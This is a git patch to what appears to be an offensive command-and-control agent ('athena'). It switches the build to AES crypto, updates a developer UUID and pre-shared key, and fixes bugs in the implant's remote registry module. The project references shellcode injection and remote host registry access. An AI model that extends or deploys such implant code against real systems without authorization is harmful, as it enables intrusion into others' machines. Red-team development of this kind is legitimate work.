From 39b845def3960e7343f0065d9945910d93d5bb13 Mon Sep 17 00:00:00 2001
From: checkymander <scottie.austin1991@gmail.com>
Date: Wed, 31 Jan 2024 17:07:29 -0500
Subject: [PATCH] fixed reg issue

---
 .../athena/agent_code/Agent/Agent.csproj      |  2 +-
 .../agent_code/Agent/Config/AgentConfig.cs    |  4 ++--
 .../athena/athena/agent_code/reg/reg.cs       | 20 +++++++++----------
 3 files changed, 13 insertions(+), 13 deletions(-)

diff --git a/Payload_Type/athena/athena/agent_code/Agent/Agent.csproj b/Payload_Type/athena/athena/agent_code/Agent/Agent.csproj
index 49f11548..c54aa06e 100644
--- a/Payload_Type/athena/athena/agent_code/Agent/Agent.csproj
+++ b/Payload_Type/athena/athena/agent_code/Agent/Agent.csproj
@@ -41,7 +41,7 @@
 	
 	<ItemGroup Condition="'$(COMPUTERNAME)' == 'DESKTOP-GRJNOH2' Or '$(COMPUTERNAME)' == 'DEV3' Or '$(COMPUTERNAME)' == 'DEV1'">		
 		<ProjectReference Include="..\Agent.Profiles.Http\Agent.Profiles.Http.csproj" />
-		<ProjectReference Include="..\Agent.Crypto.None\Agent.Crypto.None.csproj" />
+		<ProjectReference Include="..\Agent.Crypto.Aes\Agent.Crypto.Aes.csproj" />
 		<ProjectReference Include="..\Agent.Managers.Windows\Agent.Managers.Windows.csproj" />
 		<ProjectReference Include="..\inject-shellcode\inject-shellcode.csproj" />
 		<ProjectReference Include="..\arp\arp.csproj" />
diff --git a/Payload_Type/athena/athena/agent_code/Agent/Config/AgentConfig.cs b/Payload_Type/athena/athena/agent_code/Agent/Config/AgentConfig.cs
index 35144b1c..f4027b91 100644
--- a/Payload_Type/athena/athena/agent_code/Agent/Config/AgentConfig.cs
+++ b/Payload_Type/athena/athena/agent_code/Agent/Config/AgentConfig.cs
@@ -52,8 +52,8 @@ public AgentConfig()
 #if CHECKYMANDERDEV
             sleep = 1;
             jitter = 1;
-            uuid = "2964e461-08bd-478b-9797-97a65d42c4d2";
-            psk = "Zdd1AiEGNo1mpBKb/jpeZyHWam+eIFLlL5uodtuvTOk=";
+            uuid = "1983c222-a0d0-44be-a785-d8263727e437";
+            psk = "cVe+0wszHsfwqlLxBhxYFoOr99m+rmLgTTqO/1Wbo+c=";
             killDate = DateTime.Now.AddYears(1);
 #else
             uuid = "%UUID%";
diff --git a/Payload_Type/athena/athena/agent_code/reg/reg.cs b/Payload_Type/athena/athena/agent_code/reg/reg.cs
index b38a4477..1363bfb1 100644
--- a/Payload_Type/athena/athena/agent_code/reg/reg.cs
+++ b/Payload_Type/athena/athena/agent_code/reg/reg.cs
@@ -48,6 +48,7 @@ public async Task Execute(ServerJob job)
                     {
                         rr.status = "error";
                     }
+                    rr.user_output = response;
                     break;
                 case "add":
                     bool err = false;
@@ -181,7 +182,7 @@ private string NormalizeKey(string text)
 
             if (dic.ContainsKey(hive))
             {
-                text.Replace(hive, dic[hive]);
+                text = text.Replace(hive, dic[hive]);
             }
 
             return text;
@@ -191,29 +192,28 @@ private bool TryGetRegistryKey(string hostname, string keyPath, out RegistryKey
             string[] regParts = keyPath.Split('\\');
             string hive = regParts[0];
             string path = string.Join('\\', regParts, 1, regParts.Length - 1);
-
             try
             {
                 switch (hive)
                 {
                     case "HKCU":
-                        rk = string.IsNullOrEmpty(hostname) ? Registry.CurrentUser.CreateSubKey(path) :
-                            RegistryKey.OpenRemoteBaseKey(RegistryHive.CurrentUser, hostname).CreateSubKey(path);
+                        rk = string.IsNullOrEmpty(hostname) ? Registry.CurrentUser.OpenSubKey(path) :
+                            RegistryKey.OpenRemoteBaseKey(RegistryHive.CurrentUser, hostname).OpenSubKey(path);
                         err = "";
                         return true;
                     case "HKU":
-                        rk = string.IsNullOrEmpty(hostname) ? Registry.Users.CreateSubKey(path) :
-                            RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, hostname).CreateSubKey(path);
+                        rk = string.IsNullOrEmpty(hostname) ? Registry.Users.OpenSubKey(path) :
+                            RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, hostname).OpenSubKey(path);
                         err = "";
                         return true;
                     case "HKCC":
-                        rk = string.IsNullOrEmpty(hostname) ? Registry.CurrentConfig.CreateSubKey(path) :
-                            RegistryKey.OpenRemoteBaseKey(RegistryHive.CurrentConfig, hostname).CreateSubKey(path);
+                        rk = string.IsNullOrEmpty(hostname) ? Registry.CurrentConfig.OpenSubKey(path) :
+                            RegistryKey.OpenRemoteBaseKey(RegistryHive.CurrentConfig, hostname).OpenSubKey(path);
                         err = "";
                         return true;
                     case "HKLM":
-                        rk = string.IsNullOrEmpty(hostname) ? Registry.LocalMachine.CreateSubKey(path) :
-                            RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, hostname).CreateSubKey(path);
+                        rk = string.IsNullOrEmpty(hostname) ? Registry.LocalMachine.OpenSubKey(path) :
+                            RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, hostname).OpenSubKey(path);
                         err = "";
                         return true;
                     default: